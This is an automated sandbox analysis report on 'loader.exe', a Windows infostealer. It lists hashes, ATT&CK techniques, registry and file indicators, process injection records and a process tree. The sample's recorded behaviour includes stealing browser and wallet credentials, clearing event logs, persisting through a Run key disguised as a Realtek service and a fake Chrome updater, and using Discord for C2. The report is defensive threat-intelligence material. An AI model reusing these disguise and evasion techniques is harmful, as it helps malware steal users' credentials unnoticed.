0ca594179661c1ec0c7ec592be1995a14e2b0d13d0bd7a3420cb49e6254d2903

Resubmissions

07/09/2024, 14:40

240907-r14p9ayenr 10

07/09/2024, 14:33

240907-rwwh3s1alc 10

Analysis

max time kernel
150s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07/09/2024, 14:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

loader.exe
Size

14.4MB
MD5

0b36da64b85e5abae7a93017d46dcce1
SHA1

40506f88be2a8f9fc03083f8d934b58fe22c3ae5
SHA256

0ca594179661c1ec0c7ec592be1995a14e2b0d13d0bd7a3420cb49e6254d2903
SHA512

a0a8fbb2127451ae7c776fff5e2d26d1d8e035527010f7f91a2904a76edfcaa054bf5becddc29fbe98e49bd211f8ae1f94c884e8e92c9b62984313cf843d9572
SSDEEP

196608:tzElGkSaXkbEzeMeHJJ4u/RVyjwnx4YpXNzP0nreN:5ElGbFbEzVO4u/Rg9YTzF

Score

10^/10

credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

description	pid	Process	procid_target
PID 3252 created 3360	3252	.exe	56
PID 3252 created 3360	3252	.exe	56
PID 3252 created 3360	3252	.exe	56
PID 3252 created 3360	3252	.exe	56
PID 3252 created 3360	3252	.exe	56
PID 1532 created 3360	1532	updater.exe	56
PID 1532 created 3360	1532	updater.exe	56
PID 1532 created 3360	1532	updater.exe	56
PID 1532 created 3360	1532	updater.exe	56
PID 1532 created 3360	1532	updater.exe	56
PID 1532 created 3360	1532	updater.exe	56

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2284	powershell.exe
528	powershell.exe
2204	powershell.exe
4832	powershell.exe
2012	powershell.exe
4364	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	loader.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 2 IoCs

pid	Process
3252	.exe
1532	updater.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\WindowsSecurity.exe"	loader.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	discord.com
4	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3252 set thread context of 5048	3252	.exe	120
PID 1532 set thread context of 3268	1532	updater.exe	135
PID 1532 set thread context of 3936	1532	updater.exe	138
PID 1532 set thread context of 4784	1532	updater.exe	139

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2268	sc.exe
4752	sc.exe
2648	sc.exe
2432	sc.exe
5064	sc.exe
2156	sc.exe
4684	sc.exe
4616	sc.exe
4320	sc.exe
3764	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2376	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2648	wmic.exe

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	7	Go-http-client/1.1
HTTP User-Agent header	1	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1725719687"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={E0A7E1DA-20C2-4F1E-A55C-26C54D900007}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
4832	powershell.exe
1540	loader.exe
1540	loader.exe
4832	powershell.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
2204	powershell.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
2204	powershell.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe
1540	loader.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1540	loader.exe
Token: SeIncreaseQuotaPrivilege	4752	wmic.exe
Token: SeSecurityPrivilege	4752	wmic.exe
Token: SeTakeOwnershipPrivilege	4752	wmic.exe
Token: SeLoadDriverPrivilege	4752	wmic.exe
Token: SeSystemProfilePrivilege	4752	wmic.exe
Token: SeSystemtimePrivilege	4752	wmic.exe
Token: SeProfSingleProcessPrivilege	4752	wmic.exe
Token: SeIncBasePriorityPrivilege	4752	wmic.exe
Token: SeCreatePagefilePrivilege	4752	wmic.exe
Token: SeBackupPrivilege	4752	wmic.exe
Token: SeRestorePrivilege	4752	wmic.exe
Token: SeShutdownPrivilege	4752	wmic.exe
Token: SeDebugPrivilege	4752	wmic.exe
Token: SeSystemEnvironmentPrivilege	4752	wmic.exe
Token: SeRemoteShutdownPrivilege	4752	wmic.exe
Token: SeUndockPrivilege	4752	wmic.exe
Token: SeManageVolumePrivilege	4752	wmic.exe
Token: 33	4752	wmic.exe
Token: 34	4752	wmic.exe
Token: 35	4752	wmic.exe
Token: 36	4752	wmic.exe
Token: SeIncreaseQuotaPrivilege	4752	wmic.exe
Token: SeSecurityPrivilege	4752	wmic.exe
Token: SeTakeOwnershipPrivilege	4752	wmic.exe
Token: SeLoadDriverPrivilege	4752	wmic.exe
Token: SeSystemProfilePrivilege	4752	wmic.exe
Token: SeSystemtimePrivilege	4752	wmic.exe
Token: SeProfSingleProcessPrivilege	4752	wmic.exe
Token: SeIncBasePriorityPrivilege	4752	wmic.exe
Token: SeCreatePagefilePrivilege	4752	wmic.exe
Token: SeBackupPrivilege	4752	wmic.exe
Token: SeRestorePrivilege	4752	wmic.exe
Token: SeShutdownPrivilege	4752	wmic.exe
Token: SeDebugPrivilege	4752	wmic.exe
Token: SeSystemEnvironmentPrivilege	4752	wmic.exe
Token: SeRemoteShutdownPrivilege	4752	wmic.exe
Token: SeUndockPrivilege	4752	wmic.exe
Token: SeManageVolumePrivilege	4752	wmic.exe
Token: 33	4752	wmic.exe
Token: 34	4752	wmic.exe
Token: 35	4752	wmic.exe
Token: 36	4752	wmic.exe
Token: SeDebugPrivilege	4832	powershell.exe
Token: SeIncreaseQuotaPrivilege	1900	wmic.exe
Token: SeSecurityPrivilege	1900	wmic.exe
Token: SeTakeOwnershipPrivilege	1900	wmic.exe
Token: SeLoadDriverPrivilege	1900	wmic.exe
Token: SeSystemProfilePrivilege	1900	wmic.exe
Token: SeSystemtimePrivilege	1900	wmic.exe
Token: SeProfSingleProcessPrivilege	1900	wmic.exe
Token: SeIncBasePriorityPrivilege	1900	wmic.exe
Token: SeCreatePagefilePrivilege	1900	wmic.exe
Token: SeBackupPrivilege	1900	wmic.exe
Token: SeRestorePrivilege	1900	wmic.exe
Token: SeShutdownPrivilege	1900	wmic.exe
Token: SeDebugPrivilege	1900	wmic.exe
Token: SeSystemEnvironmentPrivilege	1900	wmic.exe
Token: SeRemoteShutdownPrivilege	1900	wmic.exe
Token: SeUndockPrivilege	1900	wmic.exe
Token: SeManageVolumePrivilege	1900	wmic.exe
Token: 33	1900	wmic.exe
Token: 34	1900	wmic.exe
Token: 35	1900	wmic.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3360	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1540 wrote to memory of 2316	1540	loader.exe	84
PID 1540 wrote to memory of 2316	1540	loader.exe	84
PID 1540 wrote to memory of 4752	1540	loader.exe	85
PID 1540 wrote to memory of 4752	1540	loader.exe	85
PID 1540 wrote to memory of 4832	1540	loader.exe	87
PID 1540 wrote to memory of 4832	1540	loader.exe	87
PID 1540 wrote to memory of 4212	1540	loader.exe	88
PID 1540 wrote to memory of 4212	1540	loader.exe	88
PID 1540 wrote to memory of 1900	1540	loader.exe	89
PID 1540 wrote to memory of 1900	1540	loader.exe	89
PID 1540 wrote to memory of 2648	1540	loader.exe	90
PID 1540 wrote to memory of 2648	1540	loader.exe	90
PID 1540 wrote to memory of 2204	1540	loader.exe	91
PID 1540 wrote to memory of 2204	1540	loader.exe	91
PID 1540 wrote to memory of 4340	1540	loader.exe	92
PID 1540 wrote to memory of 4340	1540	loader.exe	92
PID 1540 wrote to memory of 3188	1540	loader.exe	93
PID 1540 wrote to memory of 3188	1540	loader.exe	93
PID 1540 wrote to memory of 4816	1540	loader.exe	94
PID 1540 wrote to memory of 4816	1540	loader.exe	94
PID 1540 wrote to memory of 2376	1540	loader.exe	98
PID 1540 wrote to memory of 2376	1540	loader.exe	98
PID 1540 wrote to memory of 4156	1540	loader.exe	99
PID 1540 wrote to memory of 4156	1540	loader.exe	99
PID 4156 wrote to memory of 4124	4156	powershell.exe	100
PID 4156 wrote to memory of 4124	4156	powershell.exe	100
PID 4124 wrote to memory of 3636	4124	csc.exe	101
PID 4124 wrote to memory of 3636	4124	csc.exe	101
PID 1540 wrote to memory of 3252	1540	loader.exe	110
PID 1540 wrote to memory of 3252	1540	loader.exe	110
PID 4340 wrote to memory of 5064	4340	cmd.exe	115
PID 4340 wrote to memory of 5064	4340	cmd.exe	115
PID 4340 wrote to memory of 2156	4340	cmd.exe	116
PID 4340 wrote to memory of 2156	4340	cmd.exe	116
PID 4340 wrote to memory of 4684	4340	cmd.exe	117
PID 4340 wrote to memory of 4684	4340	cmd.exe	117
PID 4340 wrote to memory of 2268	4340	cmd.exe	118
PID 4340 wrote to memory of 2268	4340	cmd.exe	118
PID 4340 wrote to memory of 4616	4340	cmd.exe	119
PID 4340 wrote to memory of 4616	4340	cmd.exe	119
PID 3252 wrote to memory of 5048	3252	.exe	120
PID 5048 wrote to memory of 616	5048	dialer.exe	5
PID 5048 wrote to memory of 672	5048	dialer.exe	7
PID 5048 wrote to memory of 952	5048	dialer.exe	12
PID 5048 wrote to memory of 316	5048	dialer.exe	13
PID 5048 wrote to memory of 392	5048	dialer.exe	14
PID 5048 wrote to memory of 996	5048	dialer.exe	16
PID 5048 wrote to memory of 1116	5048	dialer.exe	17
PID 5048 wrote to memory of 1124	5048	dialer.exe	18
PID 5048 wrote to memory of 1132	5048	dialer.exe	19
PID 5048 wrote to memory of 1216	5048	dialer.exe	20
PID 5048 wrote to memory of 1256	5048	dialer.exe	21
PID 5048 wrote to memory of 1304	5048	dialer.exe	22
PID 5048 wrote to memory of 1344	5048	dialer.exe	23
PID 5048 wrote to memory of 1396	5048	dialer.exe	24
PID 5048 wrote to memory of 1484	5048	dialer.exe	25
PID 5048 wrote to memory of 1544	5048	dialer.exe	26
PID 5048 wrote to memory of 1552	5048	dialer.exe	27
PID 5048 wrote to memory of 1652	5048	dialer.exe	28
PID 5048 wrote to memory of 1668	5048	dialer.exe	29
PID 5048 wrote to memory of 1720	5048	dialer.exe	30
PID 5048 wrote to memory of 1764	5048	dialer.exe	31
PID 5048 wrote to memory of 1816	5048	dialer.exe	32
PID 5048 wrote to memory of 1872	5048	dialer.exe	33

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2316	attrib.exe
4212	attrib.exe
3188	attrib.exe
4816	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:316

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:392

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1132
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3080
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  PID:1532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1216

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1344
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1544

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1668

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1884

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1976

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1932

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2168

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2420

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2500

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2600

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3332

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of UnmapMainImage
PID:3360
